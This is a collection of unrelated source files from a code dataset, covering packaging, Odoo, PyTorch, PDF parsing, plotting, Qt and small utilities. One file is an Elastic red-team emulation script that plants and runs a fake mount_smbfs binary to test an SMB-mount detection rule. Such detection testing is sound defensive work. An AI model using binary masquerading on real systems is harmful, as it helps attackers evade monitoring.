import NMOSAUTH_DIR\n\nGEN_CERT_FILE = 'gen_cert.py'\nGEN_CERT_PATH = os.path.join(NMOSAUTH_DIR, GEN_CERT_FILE)\n\n\n# Basic metadata\nname = \"nmos-auth\"\nversion = \"1.5.0\"\ndescription = \"OAuth2 Server Implementation\"\nurl = 'https://github.com/bbc/nmos-auth-server'\nauthor = 'Danny Meloy'\nauthor_email = 'danny.meloy@bbc.co.uk'\nlicense = 'Apache2'\nlong_description = \"OAuth2 Server Implementation to produce JWTs for API Access\"\n\n\ndef gen_certs():\n try:\n subprocess.call([GEN_CERT_PATH])\n except Exception as e:\n print('Error: {}. 
Failed to generate certificates.'.format(str(e)))\n print('Please run \"{}\" in {}'.format(GEN_CERT_FILE, NMOSAUTH_DIR))\n pass\n\n\nclass PostDevelopCommand(develop):\n \"\"\"Post-installation for development mode.\"\"\"\n def run(self):\n develop.run(self)\n gen_certs()\n\n\nclass PostInstallCommand(install):\n \"\"\"Post-installation for installation mode.\"\"\"\n def run(self):\n install.run(self)\n gen_certs()\n\n\ndef is_package(path):\n return (\n os.path.isdir(path) and os.path.isfile(os.path.join(path, '__init__.py'))\n )\n\n\ndef find_packages(path, base=\"\"):\n \"\"\" Find all packages in path \"\"\"\n packages = {}\n for item in os.listdir(path):\n dir = os.path.join(path, item)\n if is_package(dir):\n if base:\n module_name = \"%(base)s.%(item)s\" % vars()\n else:\n module_name = item\n packages[module_name] = dir\n packages.update(find_packages(dir, module_name))\n return packages\n\n\npackages = find_packages(\".\")\npackage_names = packages.keys()\n\n# This is where you list packages which are required\npackages_required = [\n \"six\",\n \"flask\",\n \"sqlalchemy\",\n \"flask-sqlalchemy\",\n \"flask-cors\",\n \"requests\",\n \"gevent\",\n \"nmoscommon\",\n \"werkzeug>=0.14.1,<1.0.0\", # Echo pin from nmos-common to avoid Flask overriding it\n \"authlib>=0.13,<0.15\", # 0.15 requires an update to client_registration.py parsing incoming token for user\n \"pyopenssl>=16.0\",\n \"cryptography>=1.5\"\n]\n\ndeps_required = []\n\nsetup(\n name=name,\n version=version,\n description=description,\n url=url,\n author=author,\n author_email=author_email,\n license=license,\n packages=package_names,\n package_dir=packages,\n install_requires=packages_required,\n include_package_data=True,\n scripts=[\n 'bin/nmosauth'\n ],\n package_data={\n 'nmosauth': ['auth_server/templates/*', 'auth_server/static/*']\n },\n data_files=[\n ('/usr/bin', ['bin/nmosauth']),\n (NMOSAUTH_DIR, ['nmosauth/certs/{}'.format(GEN_CERT_FILE)])\n ],\n long_description=long_description,\n cmdclass={\n 'develop': PostDevelopCommand,\n 'install': PostInstallCommand\n }\n)\n","repo_name":"bbc/nmos-auth-server","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3022,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"63"} +{"seq_id":"18383528978","text":"import numpy as np\nimport json\n\ndef json_to_matrices(json_data):\n m = len(json_data['spdd']) # number of orders\n\n # Create a dictionary to map goods to units\n goods_dict = {}\n for warehouse in json_data['ck']:\n warehouse_id = list(warehouse.keys())[0]\n for good in warehouse[warehouse_id]:\n if good['spnm'] not in goods_dict:\n goods_dict[good['spnm']] = good['lg']\n \n # Create a list of warehouses based on their order in 'ckdata'\n all_warehouses = [data['cknm'] for order in json_data['spdd'] for data in order['ckdata']]\n \n # Removing duplicates while preserving the order\n all_warehouses = list(dict.fromkeys(all_warehouses))\n\n all_goods_spdd = [order['spnm'] for order in json_data['spdd']]\n all_goods_ck = list(goods_dict.keys())\n all_goods = sorted(list(set(all_goods_spdd + all_goods_ck)))\n k = len(all_goods) # Number of unique goods\n n = len(all_warehouses) # number of warehouses\n \n # Initialize matrices\n A1 = np.zeros((m, n, k))\n A2 = np.zeros((m, k))\n A3 = np.zeros((n, k))\n # W1 = 1 / np.arange(1, m+1) # We consider the priority of orders to be inversely proportional to their order\n # W2 = 1 / np.arange(1, n+1) # We consider the priority of warehouses to be 
inversely proportional to their order\n W1 = np.arange(m, 0, -1) / m * 0.3 + 0.7 # We consider the priority of orders to decrease by a fixed interval\n W2 = np.arange(n, 0, -1) / n * 0.3 + 0.7 # We consider the priority of warehouses to decrease by a fixed interval\n \n for i, order in enumerate(json_data['spdd']):\n good_id = all_goods.index(order['spnm'])\n A2[i, good_id] = order['sl']\n for j, ckdata in enumerate(order['ckdata']):\n A1[i, j, good_id] = ckdata['dwyssj']\n \n for warehouse in json_data['ck']:\n warehouse_id = list(warehouse.keys())[0]\n if warehouse_id in all_warehouses:\n i = all_warehouses.index(warehouse_id)\n for good in warehouse[warehouse_id]:\n good_id = all_goods.index(good['spnm'])\n A3[i, good_id] = good['sl']\n\n order_list = json_data['spdd']\n warehouse_list = all_warehouses\n goods_list = all_goods\n \n return A1, A2, A3, W1, W2, order_list, warehouse_list, goods_list, goods_dict\n\nif __name__=='__main__':\n with open('data/data_5.txt', 'r') as f:\n json_data = json.load(f)\n A1, A2, A3, W1, W2, order_list, warehouse_list, goods_list, goods_dict = json_to_matrices(json_data)\n print(order_list)\n print(warehouse_list)\n print(goods_list)\n print(goods_dict)\n\n# fix this code, \n# currently, `all_warehouses = [data['cknm'] for order in json_data['spdd'] for data in order['ckdata']]`\n# is not correct, because it count the warehouse with same cknm(warehous id) multiple times","repo_name":"SuuTTT/wuliu","sub_path":"src/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2837,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"2241255776","text":"from . import common\nfrom . import RtaMetadata\n\n\nmetadata = RtaMetadata(\n uuid=\"d275922f-a702-4668-a77d-c60e8df58646\",\n platforms=[\"macos\"],\n endpoint=[],\n siem=[\n {\"rule_name\": \"Attempt to Mount SMB Share via Command Line\", \"rule_id\": \"661545b4-1a90-4f45-85ce-2ebd7c6a15d0\"}\n ],\n techniques=[\"T1021\"],\n)\n\n\n@common.requires_os(*metadata.platforms)\ndef main():\n\n masquerade = \"/tmp/mount_smbfs\"\n common.create_macos_masquerade(masquerade)\n\n # Execute command\n common.log(\"Launching fake mount_smbfs command to mimic mounting a network share.\")\n common.execute([masquerade], timeout=10, kill=True)\n\n # cleanup\n common.remove_file(masquerade)\n\n\nif __name__ == \"__main__\":\n exit(main())\n","repo_name":"elastic/detection-rules","sub_path":"rta/mount_smbfs.py","file_name":"mount_smbfs.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","stars":1654,"dataset":"github-code","pt":"63"} +{"seq_id":"70298004362","text":"# -*- mode: python ; coding: utf-8 -*-\n\nblock_cipher = None\n\n\na = Analysis(['ciao_control'],\n pathex=['C:\\\\Home\\\\Programmation\\\\Projets\\\\CIAO_win\\\\control'],\n binaries=[],\n datas=[],\n hiddenimports=[],\n hookspath=[],\n runtime_hooks=[],\n excludes=[],\n win_no_prefer_redirects=False,\n win_private_assemblies=False,\n cipher=block_cipher,\n noarchive=False)\npyz = PYZ(a.pure, a.zipped_data,\n cipher=block_cipher)\nexe = EXE(pyz,\n a.scripts,\n a.binaries,\n a.zipfiles,\n a.datas,\n [],\n name='ciao_control',\n debug=False,\n bootloader_ignore_signals=False,\n strip=False,\n upx=True,\n upx_exclude=[],\n runtime_tmpdir=None,\n console=True )\n","repo_name":"lucashrm/AOC","sub_path":"for git ciao 
win/control/ciao_control.spec","file_name":"ciao_control.spec","file_ext":"spec","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"70192236040","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api\n\nclass Invoice_line(models.Model):\n _inherit= 'account.move.line'\n\n weight=fields.Float(\n related='product_id.weight',\n )\n default_code=fields.Char(\n related='product_id.default_code',\n )\n standard_price=fields.Float(\n related='product_id.standard_price',\n )\n date_invoice=fields.Date(\n related='account_id.invoice_date',\n store=True,\n )\n number=fields.Char(\n related='account_id.number',\n store=True,\n )\n name_invoice=fields.Char(\n related='account_id.name',\n store=True,\n )\n state=fields.Selection(\n related='account_id.state',\n store=True,\n )\n total_weight=fields.Float(\n compute='_total_weight',\n store=True,\n )\n user_id=fields.Many2one(\n related='account_id.invoice_user_id',\n string='Vendedor',\n store=True,\n )\n type_currency = fields.Monetary(\n related='account_id.type_currency',\n store=True,\n )\n price_subtotal_company=fields.Monetary(\n compute='_subtotal_company',\n store=True,\n\n )\n price_per_kg=fields.Float(\n compute='_price_per_kg',\n string='precio por Kg',\n store=True,\n )\n price_total_company=fields.Monetary(\n compute='_total_company',\n store=True,\n )\n re_facturado=fields.Boolean(\n related='account_id.re_facturado',\n string='Re-Facturado',\n store=True,\n )\n\n facturado_to=fields.Boolean(\n related='account_id.facturado_to',\n string='Facturado a:',\n store=True,\n )\n\n not_accumulate=fields.Boolean(\n related='account_id.not_accumulate',\n string='No Acumular',\n store=True,\n )\n\n date_applied = fields.Date(\n related='account_id.date_applied',\n string='Fecha Aplicada',\n store=True,\n )\n\n\n @api.depends('weight','quantity')\n def _total_weight(self):\n for r in self:\n r.total_weight=r.quantity*r.weight\n\n @api.depends('type_currency','price_subtotal')\n def _subtotal_company(self):\n for r in self:\n r.price_subtotal_company=r.price_subtotal*r.type_currency\n\n @api.depends('type_currency','price_total')\n def _total_company(self):\n for r in self:\n r.price_total_company=r.price_total*r.type_currency\n\n @api.depends('price_subtotal_company','total_weight')\n def _price_per_kg(self):\n for r in self:\n if r.total_weight!=0:\n if r.price_subtotal_company!=0:\n r.price_per_kg=r.price_subtotal_company/r.total_weight\n else:\n r.price_per_kg=0\n else:\n r.price_per_kg=0\n","repo_name":"humanytek/enva12","sub_path":"prod_nova/informes_invoice/models/account_invoice_line.py","file_name":"account_invoice_line.py","file_ext":"py","file_size_in_byte":2766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"21646321356","text":"from torch.autograd import Function\r\nimport torch\r\n# Inherit from Function\r\nclass LinearFunction(Function):\r\n\r\n # Note that both forward and backward are @staticmethods\r\n @staticmethod\r\n # bias is an optional argument\r\n def forward(ctx, input, weight, bias=None):\r\n ctx.save_for_backward(input, weight, bias)\r\n output = input.mm(weight.t())\r\n if bias is not None:\r\n output += bias.unsqueeze(0).expand_as(output)\r\n return output\r\n\r\n # This function has only a single output, so it gets only one gradient\r\n @staticmethod\r\n def backward(ctx, grad_output):\r\n # This is a pattern that is very convenient - at the top of 
backward\r\n # unpack saved_tensors and initialize all gradients w.r.t. inputs to\r\n # None. Thanks to the fact that additional trailing Nones are\r\n # ignored, the return statement is simple even when the function has\r\n # optional inputs.\r\n input, weight, bias = ctx.saved_tensors\r\n grad_input = grad_weight = grad_bias = None\r\n\r\n # These needs_input_grad checks are optional and there only to\r\n # improve efficiency. If you want to make your code simpler, you can\r\n # skip them. Returning gradients for inputs that don't require it is\r\n # not an error.\r\n if ctx.needs_input_grad[0]:\r\n grad_input = grad_output.mm(weight)\r\n if ctx.needs_input_grad[1]:\r\n grad_weight = grad_output.t().mm(input)\r\n if bias is not None and ctx.needs_input_grad[2]:\r\n grad_bias = grad_output.sum(0)\r\n\r\n return grad_input, grad_weight, grad_bias\r\nlinear = LinearFunction.apply\r\n\r\nprint(linear(torch.rand([10, 10]), torch.rand([10, 10])))","repo_name":"Ehaschia/DiscourseDependencyParsing","sub_path":"ncrfae/tests/grad.py","file_name":"grad.py","file_ext":"py","file_size_in_byte":1725,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"63"} +{"seq_id":"41776196691","text":"'''\r\nCreated on 2020. 2. 3.\r\n\r\n@author: GDJ-19\r\n'''\r\nimport pandas as pd \r\ninput_file=\"sales_2013.xlsx\"\r\noutput_file = \"pandas_output4.xls\"\r\ndata_frame = pd.read_excel\\\r\n (input_file,\"january_2013\",index_col=None)\r\n\r\ndata_frame_value = data_frame.loc\\\r\n [:,[\"Customer ID\",\"Sale Amount\",\"Purchase Date\"]]\r\n \r\nwriter = pd.ExcelWriter(output_file)\r\ndata_frame_value.to_excel\\\r\n (writer,sheet_name=\"jan_13_output\",index=False)\r\n\r\n#저장\r\nwriter.save()","repo_name":"yangyohan123/python","sub_path":"pythontest/0203/pandasexcelex4.py","file_name":"pandasexcelex4.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"21036506427","text":"import fitz\nfrom .dataparser import DataParser\n# Handbook of Signs & Symptoms\n\nHANDBOOK_PATH = \"./raw_data/HandbookofSignsAndSymptoms.pdf\"\nHANDBOOK_JSON_PATH = \"./processed_data/handbookofsignsandsymptoms.json\"\n\nclass HandbookDataParser(DataParser):\n def __init__(self):\n super().__init__(HANDBOOK_JSON_PATH)\n self.header2page = {} # for credits\n\n def prepare_embedding(self):\n for line in self.data:\n headers = list(line.keys())\n bigheader = headers[0]\n for header in headers:\n for text in line[header]['paragraphs']:\n # add the header to the text to increase relevance with embedding queries\n text_with_header = bigheader\n if bigheader != header:\n text_with_header += ' ' + header\n text_with_header += \": \" + text\n self.embedding_text.append(text_with_header)\n self.documents.append(text)\n\n def create_credits(self):\n for line in self.data:\n headers = list(line.keys())\n for header in headers:\n for text in line[header]['paragraphs']:\n self.credits[text] = line[header]['page']\n\n def parse_data(self):\n self.data = []\n self.header2page = {}\n\n headers = []\n connected = False\n displaying_graphic = False\n\n last_font = ''\n last_bbox = 0\n last_header = None\n\n page_n = 0\n\n current_result = {}\n\n pdf = fitz.open(HANDBOOK_PATH) \n for page in pdf[11:717]:\n dict = page.get_text(\"dict\")\n blocks = dict[\"blocks\"]\n for block in blocks:\n if \"lines\" in block.keys():\n spans = block['lines']\n for span in spans:\n data = span['spans']\n for lines in data:\n if 
GraphicFont.match(lines['font']):\n displaying_graphic = True\n if displaying_graphic and not RegularFont.match(lines['font']) and round(lines['size']) != 10:\n continue\n else:\n displaying_graphic = False\n\n connected = PDFFont.get_cls(last_font).match(lines['font'])\n indent = (last_bbox !=0 and last_bbox[0]+2 < lines['bbox'][0] and last_bbox[1]+1 < lines['bbox'][1] and RegularFont.match(lines['font']))\n \n if lines['font'] == \"Minion-SwashDisplayItalic\" and lines['size'] < 40:\n # Big fancy letter.\n if current_result:\n current_result_with_page = {}\n for key, value in current_result.items():\n current_result_with_page[key] = {'paragraphs': value, 'page': self.header2page[key]}\n self.data.append(current_result_with_page)\n current_result = {}\n\n if HeaderFont.match(lines['font']) and lines['size'] < 40:\n if not connected:\n last_header = lines['text'].lower()\n headers.append(last_header)\n else:\n if len(last_header) > 1: last_header += ' '\n last_header += lines['text'].lower()\n last_header = last_header.replace('.', '').strip()\n headers[-1] = last_header\n\n elif RegularFont.match(lines['font']):\n if last_header not in list(current_result.keys()):\n current_result[last_header] = []\n if not connected or len(current_result[last_header]) == 0 or indent:\n self.header2page[last_header] = page_n\n current_result[last_header].append(lines['text'])\n elif connected:\n if len(current_result[last_header][-1]) < 1 or current_result[last_header][-1][-1] != '-':\n current_result[last_header][-1] += ' '\n else:\n current_result[last_header][-1] = current_result[last_header][-1][:-1]\n current_result[last_header][-1] += lines['text']\n\n last_font = lines['font']\n last_bbox = lines['bbox']\n page_n += 1\n pdf.close()\n\nclass PDFFont:\n FONTS = []\n @classmethod\n def match(cls, font):\n return font in cls.FONTS\n @classmethod\n def get_cls(cls, text):\n for font in cls.__subclasses__():\n if text in font.FONTS:\n return font\n return PDFFont\n \nclass HeaderFont(PDFFont): FONTS = [\"Minion-SwashDisplayItalic\", \"AGaramond-SemiboldItalic\", \"AGaramond-Bold\", \"AGaramond-BoldItalic\"]\nclass RegularFont(PDFFont): FONTS = [\"AGaramond-Regular\", \"AGaramond-Italic\"]\nclass GraphicFont(PDFFont): FONTS = [\"Futura-CondensedBold\"]\n\n\n","repo_name":"MannanB/MedGPT","sub_path":"src/data_processing/handbook.py","file_name":"handbook.py","file_ext":"py","file_size_in_byte":5519,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"63"} +{"seq_id":"21291717567","text":"import collections\nimport slurmqueen\nimport util\n\n\"\"\"\"\nDefinition and analysis of experiments computing graph decomposition quality.\n\"\"\"\n\nTIMEOUT = 1000\n\n\nclass DecompositionData:\n def __init__(self, data_dir):\n self.__instance = slurmqueen.Experiment(\"\", []).instance(data_dir)\n\n def extract_best_decompositions_vertex_cover(self):\n data = self.__instance.query(\n \"SELECT [Carving], [Tree], [|num_vars], [|i] FROM data\"\n )\n\n # Take the best decomposition found across all solvers on each benchmark\n data = data.groupby([\"|num_vars\", \"|i\"], as_index=False).min()\n\n # Take the median runtime for each number of variables, across all 100 benchmarks\n data = data.groupby([\"|num_vars\"], as_index=False).median()\n\n if len(data) != 21:\n print(\n \"Only {0}/21 options for the numbers of variables observed for {1}\".format(\n len(data), self.__instance\n )\n )\n\n return data.sort_values(\"|num_vars\")\n\n def extract_best_decompositions_wmc(self):\n data = 
self.__instance.query(\n \"SELECT [Carving], [Tree], [|benchmark], [output] FROM data\"\n )\n\n # Take the best decomposition found across all solvers on each benchmark\n data = data.groupby([\"|benchmark\"], as_index=False).min()\n\n if len(data) != 1091:\n print(\n \"Only {0}/1091 options for the numbers of variables observed for {1}\".format(\n len(data), self.__instance\n )\n )\n return data.sort_values(\"|benchmark\")\n\n def threshold_times(self, method, width, default_val=None):\n \"\"\"\n For each log, find the time at which the solver first found a contraction tree of max-rank at or below [width].\n\n :param width: The bound on max-rank to check.\n :param default_val: The time to use if the solver never finds a good enough contraction tree\n :return: A list of times\n \"\"\"\n data = self.__instance.query(\n 'SELECT [Log] FROM data WHERE [method] =\"'\n + method\n + '\" ORDER BY [|benchmark] DESC'\n )\n result = []\n for log in data[\"Log\"]:\n best_width = None\n found = False\n if log is not None:\n for time, widths in eval(log):\n if best_width is None or widths[\"Carving\"] < best_width:\n if widths[\"Carving\"] <= width and (\n best_width is None or best_width > width\n ):\n result.append(time)\n found = True\n break\n if not found:\n result.append(default_val)\n return result\n\n\nga_vertex_cover_line = DecompositionData(\n util.data_dir(\"3/appendix_graph_analysis/cubic_vertex_cover/line\")\n)\nga_vertex_cover_factor = DecompositionData(\n util.data_dir(\"3/appendix_graph_analysis/cubic_vertex_cover/factor\")\n)\n\n\ndef plot_graph_analysis_vertex_cover(ax):\n line = ga_vertex_cover_line.extract_best_decompositions_vertex_cover()\n factor = ga_vertex_cover_factor.extract_best_decompositions_vertex_cover()\n\n DisplayInfo = collections.namedtuple(\n \"DisplayInfo\", [\"name\", \"data\", \"color\", \"marker\"]\n )\n lines_to_display = [\n DisplayInfo(\"Treewidth of $Line(G)$\", line[\"Tree\"], \"#c11e96\", \"o\"),\n DisplayInfo(\"Treewidth of $G$\", factor[\"Tree\"], \"#023880\", \"v\"),\n DisplayInfo(\n \"Carving width of $G$ using \\\\textbf{FT}\", factor[\"Carving\"], \"#a7e831\", \"s\"\n ),\n DisplayInfo(\n \"Carving width of $G$ using \\\\textbf{LG}\", line[\"Carving\"], \"#86d7a9\", \"*\"\n ),\n ]\n for exp_info in lines_to_display:\n ax.plot(\n line[\"|num_vars\"],\n exp_info.data,\n color=exp_info.color,\n linewidth=1,\n markersize=5,\n markerfacecolor=exp_info.color,\n markeredgewidth=0.5,\n markeredgecolor=\"black\",\n marker=exp_info.marker,\n label=exp_info.name,\n )\n\n util.set_legend(ax, loc=\"upper left\")\n ax.set_xticks([50, 100, 150, 200, 250])\n ax.set_xlabel(\"$n$: Number of vertices\")\n ax.set_ylabel(\"Width of decomposition\")\n\n\nga_wmc_line = DecompositionData(util.data_dir(\"3/appendix_graph_analysis/wmc/line\"))\nga_wmc_factor = DecompositionData(util.data_dir(\"3/appendix_graph_analysis/wmc/factor\"))\n\n\ndef plot_graph_analysis_lg_wmc(ax):\n line = ga_wmc_line.extract_best_decompositions_wmc()\n\n def cap_data(data, column):\n data = data.copy()\n data.loc[data[column] > 200, column] = 200\n return data[column]\n\n DisplayInfo = collections.namedtuple(\"DisplayInfo\", [\"name\", \"data\", \"color\"])\n bars_to_display = [\n DisplayInfo(\"Treewidth of $Line(G)$\", cap_data(line, \"Tree\"), \"#c11e96\"),\n DisplayInfo(\n \"Carving width of $G$ using \\\\textbf{LG}\",\n cap_data(line, \"Carving\"),\n \"#86d7a9\",\n ),\n ]\n\n ax.hist(\n [d.data for d in bars_to_display],\n bins=range(0, 210, 10),\n histtype=\"bar\",\n color=[d.color for d in 
bars_to_display],\n label=[d.name for d in bars_to_display],\n )\n\n util.set_legend(ax, loc=\"upper right\")\n ax.set_xticks([0, 50, 100, 150, 200])\n ax.set_xticklabels([\"0\", \"50\", \"100\", \"150\", \"$200+$\"])\n\n ax.set_xlabel(\"Width of decomposition\")\n ax.set_ylabel(\"Number of benchmarks\")\n\n\ndef plot_graph_analysis_ft_wmc(ax):\n factor = ga_wmc_factor.extract_best_decompositions_wmc()\n\n def cap_data(data, column):\n data = data.copy()\n data.loc[data[column] > 50, column] = 50\n return data[column]\n\n DisplayInfo = collections.namedtuple(\"DisplayInfo\", [\"name\", \"data\", \"color\"])\n bars_to_display = [\n DisplayInfo(\"Treewidth of $G$\", cap_data(factor, \"Tree\"), \"#023880\"),\n DisplayInfo(\n \"Carving width after \\\\textbf{FT}\", cap_data(factor, \"Carving\"), \"#a7e831\"\n ),\n ]\n\n ax.hist(\n [d.data for d in bars_to_display],\n bins=range(0, 54, 2),\n histtype=\"bar\",\n align=\"mid\",\n color=[d.color for d in bars_to_display],\n label=[d.name for d in bars_to_display],\n )\n\n util.set_legend(ax, loc=\"upper right\")\n ax.set_xticks([0, 10, 20, 30, 40, 50])\n ax.set_xticklabels([\"0\", \"10\", \"20\", \"30\", \"40\", \"$50+$\"])\n\n ax.set_xlabel(\"Width of decomposition\")\n ax.set_ylabel(\"Number of benchmarks\")\n\n\ndef plot_planning_fig(axs):\n for ax, width in zip(axs, [30, 25, 20]):\n ax.plot(\n *util.cactus(\n ga_wmc_factor.threshold_times(\"factor-htd\", width, default_val=TIMEOUT)\n ),\n label=\"FT+htd\",\n color=\"#ffd700\",\n linestyle=\"--\",\n linewidth=2,\n )\n\n ax.plot(\n *util.cactus(\n ga_wmc_factor.threshold_times(\"factor-Flow\", width, default_val=TIMEOUT)\n ),\n label=\"FT+Flow\",\n color=\"#ffb14e\",\n linestyle=\":\",\n linewidth=2,\n )\n ax.plot(\n *util.cactus(\n ga_wmc_factor.threshold_times(\n \"factor-Tamaki\", width, default_val=TIMEOUT\n )\n ),\n label=\"FT+Tamaki\",\n color=\"#fa8775\",\n linestyle=\"-\",\n linewidth=2,\n )\n util.set_cactus_axes(\n ax, 1091, TIMEOUT, legend_args={\"loc\": \"lower right\"}, bottom=0.1\n )\n\n\ndef gen(output):\n f, ax = output.figure(0.6, ncols=1)\n plot_graph_analysis_vertex_cover(ax)\n f.save(\"3/appendix_vertex_cover_width\")\n\n f, ax = output.figure(0.6, ncols=1)\n plot_graph_analysis_lg_wmc(ax)\n f.save(\"3/appendix_wmc_lg_width\")\n\n f, ax = output.figure(0.6, ncols=1)\n plot_graph_analysis_ft_wmc(ax)\n f.save(\"3/appendix_wmc_ft_width\")\n\n f, axs = output.figure(1, nrows=3)\n plot_planning_fig(axs)\n f.save(\"3/tree_solver_analysis\")\n\n\nif __name__ == \"__main__\":\n gen(util.output_pdf())\n","repo_name":"Kasekopf/PhD-Thesis","sub_path":"experiments/src/3/gen_decomposition.py","file_name":"gen_decomposition.py","file_ext":"py","file_size_in_byte":8151,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"38784507653","text":"# -*- coding: utf-8 -*-\n\nfrom PyQt4 import QtCore, QtGui\nfrom UI_CLASSES.ingresar_integrante import Ui_ingresar_integrante\nfrom CLASSES.usuario import Usuario\n\ntry:\n _fromUtf8 = QtCore.QString.fromUtf8\nexcept AttributeError:\n def _fromUtf8(s):\n return s\n\nclass IngresarIntegrante(QtGui.QDialog):\n\n def __init__(self,grupo_actual,conexionDB):\n super(IngresarIntegrante, self).__init__()\n self.ingreso = Ui_ingresar_integrante()\n self.ingreso.setupUi(self)\n self.grupo_actual=grupo_actual\n self.conexionDB=conexionDB\n self.ing_integrante=None\n QtCore.QObject.connect(self.ingreso.btIntegrante, QtCore.SIGNAL('clicked()'),\n self.Ingresar)\n self.exec_()\n\n\n def Ingresar(self):\n 
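# (Editor's note, added) Read the e-mail typed into the dialog and try to add\n        # it to the current group; the code below treats a None return from\n        # agregar_usuario_grupo as success and anything else as a duplicate e-mail.\n        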
integrant=self.ingreso.txtintegrante.text()\n        ing_integrante=Usuario(email=integrant,ultimo_acceso=\"\", total_emails=0)\n        ok = self.conexionDB.agregar_usuario_grupo(ing_integrante, self.grupo_actual)\n        print(ok)\n        if ok is None:\n            QtGui.QMessageBox.warning(self, 'informacion', 'El Integrante se ha'\n                                      ' ingresado exitosamente.')\n            self.ingreso.hide()\n        else:\n            QtGui.QMessageBox.warning(self, 'Error', ' El correo ya existe, intentelo'\n                                      ' de nuevo.')\n\n","repo_name":"Daniers/Superior-Core","sub_path":"App Superior Core/CLASSES/ingresar_integrante.py","file_name":"ingresar_integrante.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"}
{"seq_id":"37248993783","text":"import codecs\n\nw = codecs.open('matching_result.txt','w','utf-8')\nwith codecs.open('search_result.txt','r','utf-8') as file:\n    while True:\n        line = file.readline()\n        if not line or line.strip() == \"end\":\n            break\n\n        if 'matching' in line:\n            if '.0' in line:\n                w.write(line)\n\n        else:\n            continue\n","repo_name":"skku-swpc/yonsei_dilab_sentiment","sub_path":"sentiment/matching_result.py","file_name":"matching_result.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
{"seq_id":"32664771173","text":"import tensorflow as tf\n\n# Load the already trained model\nmodelo = tf.keras.models.load_model('model')\n# Show the info about the model\nmodelo.summary()\n\n\n\n# import the numpy library\nimport numpy as np\n\ndef predecir(input):\n    #Normalize the image\n    img = np.array(input).astype(float)/255\n    img = cv2.resize(img, (224,224))\n\n    output = modelo.predict(img.reshape(-1, 224, 224, 3))\n    return np.argmax(output[0])\n\n\n\nimport cv2\n# define a video capture object\nvid = cv2.VideoCapture(0)\n\nwhile(True):\n    # Capture the video frame\n    # by frame\n    ret, frame = vid.read()\n    \n    # Run the analysis and pick the label to display\n    analisis = predecir(frame)\n    texto = 'esperando'\n    if(analisis == 1):\n        texto = 'Exportacion'\n    elif(analisis == 2):\n        texto = 'Rechazar'\n    else:\n        texto = 'Aceptable'\n    \n    # Text configuration, font, size, position\n    font = cv2.FONT_HERSHEY_SIMPLEX \n    cv2.putText(frame, texto, (7,70), font, 3, (100, 255, 0), 3, cv2.LINE_AA)\n    \n    \n    # Display the resulting frame\n    cv2.imshow('frame', frame)\n    \n    # the 'q' button is set as the\n    # quitting button\n    if cv2.waitKey(1) & 0xFF == ord('q'):\n        break\n    \n# After the loop release the cap object\nvid.release()\n# Destroy all the windows\ncv2.destroyAllWindows()\n\n\n\n","repo_name":"CinnamonTheGreat/clasificador-mango","sub_path":"src/clasificador.py","file_name":"clasificador.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
{"seq_id":"18801805146","text":"from typing import Generator, List, Optional\nfrom kd_common import logutil\nimport subprocess\nimport contextlib\nimport re\n\nfrom kd_splicing.models import AlignStatus\nfrom kd_splicing.exception import CustomException\n\n_logger = logutil.get_logger(__name__)\n\ndef run_multiple(input_files: List[str]) -> List[str]:\n    return [run_single(f) for f in input_files]\n\ndef run_single(input_file: str, output_file: Optional[str] = None) -> str:\n    if not output_file:\n        output_file = input_file + \".aligned\"\n\n    blast_args = [\n        \"kalign\", \"-i\", input_file, \"-o\", output_file,\n    ]\n    _logger.info(\"Start Kalign\")\n    try:\n        r = subprocess.check_output(blast_args, stderr=subprocess.STDOUT, timeout=10)\n    except subprocess.CalledProcessError as e:\n        raise CustomException(\"Kalign alignment error\")\n    except subprocess.TimeoutExpired as e:\n        raise CustomException('One of the entered sequences is too long, check out troubleshooting')\n    _logger.info(r)\n    _logger.info(\"Finish Kalign\")\n    return output_file\n","repo_name":"kdcd/catsnap","sub_path":"kd_splicing/kd_splicing/kalign.py","file_name":"kalign.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
{"seq_id":"24877570804","text":"from typing import List\nfrom collections import defaultdict\n\n\nclass Solution:\n    def find_sub_arrays(self, nums: List[int]) -> bool:\n        if len(nums) == 2:\n            return False\n        # map each length-2 (adjacent) subarray sum to the start indices where it occurs\n        d = defaultdict(list)\n        for i in range(len(nums) - 1):\n            s = nums[i] + nums[i + 1]\n            d[s].append(i)\n        for key, values in d.items():\n            if len(values) >= 2:\n                return True\n        return False\n\ns = Solution()\nprint(s.find_sub_arrays(nums = [4,2,4]))","repo_name":"AliAnsariArshad/LeetCode","sub_path":"Problems/Easy/Array[list]/FindSubArrays.py","file_name":"FindSubArrays.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
